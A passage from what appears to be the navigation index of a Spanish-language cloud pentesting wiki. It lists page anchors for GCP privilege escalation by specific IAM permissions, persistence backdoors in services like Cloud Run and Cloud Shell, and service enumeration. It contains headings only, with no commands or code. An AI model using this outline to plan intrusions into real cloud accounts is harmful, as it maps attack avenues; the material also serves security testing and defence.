scalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignblob","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignjwt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetopenidtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#gcp---kms-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#kms","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecrypt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecryptviadelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#gcp---orgpolicy-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicypolicyset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#gcp---pubsub-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsub","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#gcp---resourcemanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerorganizationssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerfolderssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerprojectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#gcp---ejecutar-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#cloud-run","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicescreate--iamserviceaccountsactas--runroutesinvoke","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicesupdate--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobscreate-runjobsrun-iamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsupdaterunjobsruniamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsrun-runjobsrunwithoverrides-runjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#gcp---secretmanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagersecretssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#gcp---serviceusage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusage","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageservicesenable----serviceusageservicesuse","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#gcp---sourcerepos-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#repositorios-de-código","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcerepossetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#acceso-a-secretos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#agregar-claves-ssh","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#credenciales-manuales","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdateprojectconfig","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcp---storage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#almacenamiento","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagebucketssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectscreate-storageobjectsdelete--permisos-de-escritura-en-almacenamiento","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#cloud-functions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcr","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#gcp---workflows-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflows","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowscreate-iamserviceaccountsactas-workflowsexecutionscreate-workflowsworkflowsget-workflowsoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#filtrar-el-token-oidc-y-oauth","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowsupdate-","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#gcp---escalación-de-privilegios-por-permisos-genéricos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#permisos-interesantes-genéricos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#setiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#create-update","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#serviceaccount","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#gcp---escape-de-docker-en-la-red","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#estado-inicial","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#explicación-del-ataque","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#técnica-de-escape","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#gcp---escalamiento-local-de-privilegios-ssh-pivoting","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#leer-los-scripts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#metadatos-personalizados","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#abusando-de-los-permisos-de-iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#buscar-claves-en-el-sistema-de-archivos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#más-expresiones-regulares-de-claves-api","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#referencias","pentesting-cloud/gcp-security/gcp-persistence/index.html#gcp---persistencia","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#gcp---persistencia-de-claves-api","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#claves-api","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#crear-nuevas--acceder-a-las-existentes","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#gcp---persistencia-en-app-engine","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#app-engine","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#modificar-código","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#persistencia-de-versiones-antiguas","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#gcp---persistencia-en-el-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#registro-de-artefactos","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#confusión-de-dependencias","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#gcp---persistencia-en-bigquery","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#bigquery","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#conceder-acceso-adicional","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#gcp---persistencia-de-cloud-functions","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#cloud-functions","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#técnicas-de-persistencia","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#gcp---persistencia-en-cloud-run","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#cloud-run","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#revisión-con-puerta-trasera","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#servicio-accesible-públicamente","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#servicio-o-trabajo-con-puerta-trasera","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#gcp---persistencia-en-cloud-shell","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#cloud-shell","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#puerta-trasera-persistente","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#referencias","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#gcp---persistencia-de-cloud-sql","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#cloud-sql","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#exponer-la-base-de-datos-y-añadir-tu-dirección-ip-a-la-lista-blanca","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#crear-un-nuevo-usuario--actualizar-la-contraseña-de-los-usuarios--obtener-la-contraseña-de-un-usuario","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#gcp---persistencia-en-compute","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#compute","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#persistencia-abusando-de-instancias-y-copias-de-seguridad","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#gcp---persistencia-de-dataflow","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#dataflow","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#persistencia-invisible-en-contenedor-construido","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#gcp---persistencia-en-filestore","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#filestore","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#dar-acceso-y-privilegios-más-amplios-sobre-un-montaje","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#gcp---persistencia-de-registros","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#registros","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#loggingsinkscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#gcp---persistencia-del-secret-manager","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#secret-manager","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#mal-uso-de-la-rotación","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#gcp---persistencia-de-almacenamiento","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#almacenamiento","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#dar-acceso-público","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#gcp---persistencia-de-tokens","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#tokens-de-usuario-autenticados","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#flujo-de-autenticación","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#alcances-de-oauth","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#cuentas-de-servicio","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#metadatos","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#remediaciones","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#referencias","pentesting-cloud/gcp-security/gcp-services/index.html#gcp---servicios","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#gcp---enumeración-de-la-plataforma-ai","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#plataforma-ai","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#gcp---api-keys-enum","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#restricciones","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#escalación-de-privilegios-y-post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#gcp---app-engine-enum","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#contenedores","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#urls-y-regiones","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#gcp---enumeración-del-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#formatos-y-modos","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#políticas-de-limpieza","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#escaneo-de-vulnerabilidades","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#acceso-no-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#gcp---batch-enum","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#cuenta-de-servicio","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#gcp---bigquery-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#expiración","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#fuentes-externas","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#acls-del-conjunto-de-datos","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#control-de-acceso-a-filas-de-tabla","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#control-de-acceso-a-columnas","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#bigquery-sql-injection","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#escalamiento-de-privilegios-y-post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#gcp---bigtable-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#bigtable","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#gcp---enumeración-de-cloud-build","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#eventos","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#ejecución","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#permisos-de-sa","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#aprobaciones","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#aprobaciones-de-pr","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#conexiones-y-repositorios","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#conectar-un-repositorio","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#obtener-shell","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#acceso-no-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#gcp---enumeración-de-cloud-functions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#registro-de-artefactos","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#disparadores-url-y-autenticación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#dentro-de-la-cloud-function","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#acceso-no-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#gcp---cloud-run-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#servicios-y-trabajos","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#servicio-de-cloud-run","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#detalles-relevantes","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run-jobs","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#escalamiento-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#acceso-no-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#gcp---enumeración-de-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#gcp---cloud-sql-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#contraseña","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#disponibilidad-de-zona","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#conexiones","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#protección-de-datos","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#enum-no-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#gcp---enumeración-de-cloud-scheduler","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#cuentas-de-servicio","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp---enumeración-de-compute","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp-vpc-y-redes","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#instancias-de-cómputo","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeración-1","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#escalamiento-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#registros-de-consola-serial","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#salida-de-scripts-de-inicio","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#os-configuration-manager","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#imágenes","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#imágenes-personalizadas","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#plantillas-de-instancia-personalizadas","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#instantáneas","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeración-2","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#gcp---compute-instances","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#vm-confidencial","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#disco-y-cifrado-de-disco","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#desplegar-contenedor","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#cuenta-de-servicio","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#redes","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#seguridad-extra","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#acceso-a-la-vm","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#metadatos","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#gcp---vpc-y-redes","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#redes-de-cómputo-gcp-en-resumen","pentesting-cloud/gcp-security